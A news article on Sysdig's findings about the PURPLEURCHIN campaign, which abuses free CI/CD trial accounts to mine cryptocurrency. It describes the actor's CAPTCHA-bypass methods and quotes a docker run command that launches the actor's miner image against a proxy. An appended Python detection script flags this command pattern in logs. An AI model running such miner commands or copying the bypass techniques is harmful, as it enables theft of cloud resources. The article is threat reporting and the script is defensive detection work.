Security researchers at Sysdig say that they have identified a previously unreported threat actor “using some of the largest cloud and continuous integration and deployment (CI/CD) service providers” in a massive “freejacking” campaign that makes use of trial accounts’ free compute to power cryptomining campaigns.
Dubbing it PURPLEURCHIN, Sysdig said the operation is highly obfuscated and “employs automation at multiple levels, with more than 130 Docker Hub images and regularly rotating CI/CD accounts on various platforms.”
Whilst such service providers use multiple measures to ensure users are not just hitting their API endpoints, PURPLEURCHIN manages to bypass all of these defenses by using VPNs and the Brave browser in initial registration, XDOTOOL for realistic keyboard and mouse input, and a Python package called Wit for speech recognition of .wav audio files, which allows them to bypass CAPTCHA systems using the audio input option.
The threat actor’s efforts are “abnormal” versus the apparent reward, the Sysdig Threat Research Team said.
They include spawning numerous GitHub accounts (as well as 2,000 identified accounts at development environment Heroku and 900 identified accounts at automation platform Buddy) and then using the free-tier automated GitHub Actions CI/CD tools and their equivalents to power the actual mining operations.
Sysdig said: “We estimated that PURPLEURCHIN would need to use several thousand free accounts to earn $137” – speculating that the campaign may be the threat actor preparing to attack the underlying blockchains.
The company said in a blog post today: “Proof-of-work algorithms are vulnerable to the 51% attack, where an attacker controls 51% of a network’s hashrate, thereby controlling the ‘entire’ network, with some caveats.”
They speculated: “With an operation of this scale, PURPLEURCHIN could potentially control the 51% majority of a cryptocurrency’s validation mechanisms, allowing them to validate arbitrary transactions associated with any of their attacker-controlled cryptocurrency wallets [allowing] them to potentially steal millions of dollars worth of cryptocurrency, depending on the market capitalizations of said currencies.”
PURPLEURCHIN Freejacking campaign: Multiple coins being mined
“When the initial observed PURPLEURCHIN Docker Hub image was executed, it triggered GitHub Actions in several repositories via HTTP,” Sysdig explained. These GitHub repositories contain only workflow actions that use Docker to run different containers from the actor’s Docker Hub account. The GitHub Actions previously mentioned were used to launch 30-plus instances (per Action run) of various Docker images.
“One such example is the following command line:
docker run -d linux88884474/webappweblinux88 /bin/bash /linux88 <proxy_ip> 24000 webappapp8888 2048 32
Where the arguments following /bin/bash are:
- Script to run.
- Proxy IP.
- Proxy port to connect to.
- Name of this particular miner instance used when connecting to the Stratum proxy.
- Amount of /dev/shm memory to use (in megabytes).
- Number of bits to use in the CPU architecture.
This script, which eventually calls a nodejs file index.js, launches a Tidecoin miner. The miner uses a CPU-based mining algorithm called yespower. This is notable because cryptojackers will usually just use XMRig downloaded straight from GitHub, the de facto CPU miner for Monero, whereas PURPLEURCHIN is opting for a CPU miner that gets called via nodejs. An open question while performing this research was “Why these coins in particular?” As the value of the coins was so low, mining them seemed to be minimally profitable, even at scale. Our theory here is that the threat actor is choosing these coins based on the yespower algorithm because the mining process can be spawned from said nodejs parent, aiding in evading detection.
Tidecoin is just one of several cryptocurrencies that PURPLEURCHIN currently mines. Others include Onyx, Sugarchain, Sprint, Yenten, Arionum, MintMe, and Bitweb. The actor appears to be experimenting.
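
The command-line shape quoted above and the 30-plus launches per Action run can be turned into a triage check over container-launch logs. The following Python is an added example, not Sysdig's code; the `(run_id, cmdline)` event format, the function names and the sample events are constructed assumptions.

```python
import shlex
from collections import Counter

# Labels follow the article's list of arguments after /bin/bash.
FIELDS = ("script", "proxy_ip", "proxy_port", "worker_name", "shm_mb", "cpu_bits")
# The command line quoted in the article (proxy address is a placeholder there).
PAGE_CMD = ("docker run -d linux88884474/webappweblinux88 /bin/bash /linux88 "
            "<proxy_ip> 24000 webappapp8888 2048 32")

def parse_docker_run(cmdline):
    """Return the image, account and labelled arguments, or None if the shape differs."""
    try:
        tok = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a damaged log line
        return None
    if tok[:2] != ["docker", "run"] or "/bin/bash" not in tok:
        return None
    sh = tok.index("/bin/bash")
    args = tok[sh + 1:]
    if sh < 3 or len(args) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, args), image=tok[sh - 1])
    if not all(rec[k].isdigit() for k in ("proxy_port", "shm_mb", "cpu_bits")):
        return None
    if not 0 < int(rec["proxy_port"]) < 65536:
        return None
    rec["account"] = rec["image"].split("/")[0]  # Docker Hub namespace
    return rec

def flag_bursts(events, threshold=30):
    """Count miner-shaped launches per (run_id, account); return those at or over threshold."""
    counts = Counter()
    for run_id, cmdline in events:
        rec = parse_docker_run(cmdline)
        if rec:
            counts[(run_id, rec["account"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

def sample_events():
    """Constructed events: 32 miner-shaped launches in one run, two ordinary ones in another."""
    burst = [("run-A", f"docker run -d exampleacct/img{i} /bin/bash /start "
                       f"192.0.2.10 24000 worker{i} 2048 32") for i in range(32)]
    quiet = [("run-B", "docker run --rm alpine:3.19 /bin/sh -c 'echo ok'"),
             ("run-B", "docker run -d nginx:1.25")]
    return burst + quiet

if __name__ == "__main__":
    print(parse_docker_run(PAGE_CMD))
    print(flag_bursts(sample_events()))
```

The default threshold of 30 mirrors the per-run instance count reported in the article; tune it to the normal launch volume of the CI environment being monitored.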